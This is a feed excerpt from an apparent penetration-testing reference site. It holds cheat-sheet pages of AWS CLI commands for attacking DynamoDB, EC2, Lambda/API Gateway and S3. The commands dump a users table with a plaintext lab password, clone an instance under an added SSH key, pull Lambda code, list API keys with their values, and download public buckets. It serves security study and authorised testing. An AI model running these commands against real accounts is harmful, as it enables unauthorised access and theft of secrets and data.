&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="o"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="enumerate-table-content" class="anchored-heading"&gt;Enumerate Table Content&lt;a class="heading-anchor" href="#enumerate-table-content" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;$ aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users &lt;span class="p"&gt;|&lt;/span&gt; jq -r &lt;span class="s1"&gt;&amp;#39;.Items[]&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="o"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="s2"&gt;&amp;#34;password&amp;#34;&lt;/span&gt;: &lt;span class="o"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="s2"&gt;&amp;#34;S&amp;#34;&lt;/span&gt;: &lt;span class="s2"&gt;&amp;#34;Management@#1@#&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="o"&gt;}&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="s2"&gt;&amp;#34;username&amp;#34;&lt;/span&gt;: &lt;span class="o"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="s2"&gt;&amp;#34;S&amp;#34;&lt;/span&gt;: &lt;span class="s2"&gt;&amp;#34;Mgmt&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="o"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/dynamodb/"&gt;Amazon DynamoDB Documentation - AWS&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>AWS - Service - EC2</title><link>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-ec2/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-ec2/</guid><description>&lt;ul&gt;
&lt;li&gt;&lt;a href="https://labs.bishopfox.com/dufflebag"&gt;dufflebag&lt;/a&gt; - Find secrets that are accidentally exposed via Amazon EBS&amp;rsquo;s &amp;ldquo;public&amp;rdquo; mode&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="listing-information-about-ec2" class="anchored-heading"&gt;Listing Information About EC2&lt;a class="heading-anchor" href="#listing-information-about-ec2" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;ec2&lt;/span&gt; &lt;span class="nb"&gt;describe-instances&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;ec2&lt;/span&gt; &lt;span class="nb"&gt;describe-instances&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-region&lt;/span&gt; &lt;span class="n"&gt;region&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;ec2&lt;/span&gt; &lt;span class="nb"&gt;describe-instances&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-instance-ids&lt;/span&gt; &lt;span class="n"&gt;ID&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="copy-ec2-using-ami-image" class="anchored-heading"&gt;Copy EC2 using AMI Image&lt;a class="heading-anchor" href="#copy-ec2-using-ami-image" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;First you need to extract data about the current instances and their AMI/security groups/subnet : &lt;code&gt;aws ec2 describe-images --region eu-west-1&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# create a new image for the instance-id&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;ec2&lt;/span&gt; &lt;span class="nb"&gt;create-image&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-instance-id&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;0438b003d81cd7ec5&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-name&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;AWS Audit&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-description&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Export AMI&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-region&lt;/span&gt; &lt;span class="nb"&gt;eu-west&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# add key to AWS&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;ec2&lt;/span&gt; &lt;span class="nb"&gt;import-key&lt;/span&gt;&lt;span class="n"&gt;-pair&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-key-name&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;AWS Audit&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-public-key-material&lt;/span&gt; &lt;span class="n"&gt;file&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//~/.&lt;/span&gt;&lt;span class="n"&gt;ssh&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;id_rsa&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;pub&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-region&lt;/span&gt; &lt;span class="nb"&gt;eu-west&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# create ec2 using the previously created AMI, use the same security group and subnet to connect easily.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;ec2&lt;/span&gt; &lt;span class="nb"&gt;run-instances&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-image-id&lt;/span&gt; &lt;span class="n"&gt;ami&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;0b77e2d906b00202d&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-security-group-ids&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;sg-6d0d7f01&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-subnet-id&lt;/span&gt; &lt;span class="n"&gt;subnet&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;9eb001ea&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-count&lt;/span&gt; &lt;span class="mf"&gt;1&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-instance-type&lt;/span&gt; &lt;span class="n"&gt;t2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;micro&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-key-name&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;AWS Audit&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-query&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Instances[0].InstanceId&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-region&lt;/span&gt; &lt;span class="nb"&gt;eu-west&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# now you can check the instance &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;ec2&lt;/span&gt; &lt;span class="nb"&gt;describe-instances&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-instance-ids&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;0546910a0c18725a1&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# If needed : edit groups&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;ec2&lt;/span&gt; &lt;span class="nb"&gt;modify-instance&lt;/span&gt;&lt;span class="n"&gt;-attribute&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-instance-id&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;i-0546910a0c18725a1&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-groups&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;sg-6d0d7f01&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-region&lt;/span&gt; &lt;span class="nb"&gt;eu-west&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# be a good guy, clean our instance to avoid any useless cost&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;ec2&lt;/span&gt; &lt;span class="nb"&gt;stop-instances&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-instance-id&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;i-0546910a0c18725a1&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-region&lt;/span&gt; &lt;span class="nb"&gt;eu-west&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;ec2&lt;/span&gt; &lt;span class="nb"&gt;terminate-instances&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-instance-id&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;i-0546910a0c18725a1&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-region&lt;/span&gt; &lt;span class="nb"&gt;eu-west&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="mount-ebs-volume-to-ec2-linux" class="anchored-heading"&gt;Mount EBS volume to EC2 Linux&lt;a class="heading-anchor" href="#mount-ebs-volume-to-ec2-linux" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;:warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken.&lt;/p&gt;</description></item><item><title>AWS - Service - Lambda &amp; API Gateway</title><link>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-lambda/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-lambda/</guid><description>&lt;h2 id="list-lambda-functions" class="anchored-heading"&gt;List Lambda Functions&lt;a class="heading-anchor" href="#list-lambda-functions" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;lambda&lt;/span&gt; &lt;span class="nb"&gt;list-functions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="invoke-a-lambda-function" class="anchored-heading"&gt;Invoke a Lambda Function&lt;a class="heading-anchor" href="#invoke-a-lambda-function" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;lambda&lt;/span&gt; &lt;span class="n"&gt;invoke&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-function-name&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;json&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-region&lt;/span&gt; &lt;span class="n"&gt;region&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="extract-functions-code" class="anchored-heading"&gt;Extract Function&amp;rsquo;s Code&lt;a class="heading-anchor" href="#extract-functions-code" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;lambda&lt;/span&gt; &lt;span class="nb"&gt;list-functions&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-profile&lt;/span&gt; &lt;span class="n"&gt;uploadcreds&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;lambda&lt;/span&gt; &lt;span class="nb"&gt;get-function&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-function-name&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-query&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Code.Location&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-profile&lt;/span&gt; &lt;span class="n"&gt;uploadcreds&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;wget &lt;/span&gt;&lt;span class="n"&gt;-O&lt;/span&gt; &lt;span class="nb"&gt;lambda-function&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;zip&lt;/span&gt; &lt;span class="nb"&gt;url-from&lt;/span&gt;&lt;span class="n"&gt;-previous-query&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-profile&lt;/span&gt; &lt;span class="n"&gt;uploadcreds&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="list-api-gateway" class="anchored-heading"&gt;List API Gateway&lt;a class="heading-anchor" href="#list-api-gateway" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;apigateway&lt;/span&gt; &lt;span class="nb"&gt;get-rest&lt;/span&gt;&lt;span class="n"&gt;-apis&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;apigateway&lt;/span&gt; &lt;span class="nb"&gt;get-rest&lt;/span&gt;&lt;span class="n"&gt;-api&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-rest-api-id&lt;/span&gt; &lt;span class="n"&gt;ID&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="listing-information-about-endpoints" class="anchored-heading"&gt;Listing Information About Endpoints&lt;a class="heading-anchor" href="#listing-information-about-endpoints" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;apigateway&lt;/span&gt; &lt;span class="nb"&gt;get-resources&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-rest-api-id&lt;/span&gt; &lt;span class="n"&gt;ID&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;apigateway&lt;/span&gt; &lt;span class="nb"&gt;get-resource&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-rest-api-id&lt;/span&gt; &lt;span class="n"&gt;ID&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-resource-id&lt;/span&gt; &lt;span class="n"&gt;ID&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;apigateway&lt;/span&gt; &lt;span class="nb"&gt;get-method&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-rest-api-id&lt;/span&gt; &lt;span class="n"&gt;ApiID&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-resource-id&lt;/span&gt; &lt;span class="n"&gt;ID&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-http-method&lt;/span&gt; &lt;span class="n"&gt;method&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="listing-api-keys" class="anchored-heading"&gt;Listing API Keys&lt;a class="heading-anchor" href="#listing-api-keys" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;apigateway&lt;/span&gt; &lt;span class="nb"&gt;get-api&lt;/span&gt;&lt;span class="n"&gt;-keys&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-include-values&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="getting-information-about-a-specific-api-key" class="anchored-heading"&gt;Getting Information About A Specific Api Key&lt;a class="heading-anchor" href="#getting-information-about-a-specific-api-key" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;apigateway&lt;/span&gt; &lt;span class="nb"&gt;get-api&lt;/span&gt;&lt;span class="n"&gt;-key&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-api-key&lt;/span&gt; &lt;span class="n"&gt;KEY&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed"&gt;Getting shell and data access in AWS by chaining vulnerabilities - Appsecco - Riyaz Walikar - Aug 29, 2019&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>AWS - Service - S3 Buckets</title><link>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-s3-bucket/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-s3-bucket/</guid><description>&lt;p&gt;An AWS S3 bucket is a cloud-based storage container that holds files, known as objects, which can be accessed over the internet. It is highly scalable and can store large amounts of data, such as documents, images, and backups. S3 provides robust security through access control, encryption, and permissions management. It ensures high durability and availability, making it ideal for storing and retrieving data from anywhere.&lt;/p&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/aws/aws-cli"&gt;aws/aws-cli&lt;/a&gt; - Universal Command Line Interface for Amazon Web Services&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="n"&gt;apt&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;awscli&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;&lt;a href="https://digi.ninja/projects/bucket_finder.php"&gt;digi.ninja/bucket-finder&lt;/a&gt; - Search for public buckets, list and download all files if directory indexing is enabled&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;wget &lt;/span&gt;&lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;digi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ninja&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;files&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;bucket_finder_1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;tar&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;bz2&lt;/span&gt; &lt;span class="n"&gt;-O&lt;/span&gt; &lt;span class="n"&gt;bucket_finder_1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;tar&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;bz2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;bucket_finder&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;rb&lt;/span&gt; &lt;span class="n"&gt;my_words&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;bucket_finder&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;rb&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-region&lt;/span&gt; &lt;span class="n"&gt;ie&lt;/span&gt; &lt;span class="n"&gt;my_words&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;bucket_finder&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;rb&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-download&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-region&lt;/span&gt; &lt;span class="n"&gt;ie&lt;/span&gt; &lt;span class="n"&gt;my_words&lt;/span&gt;
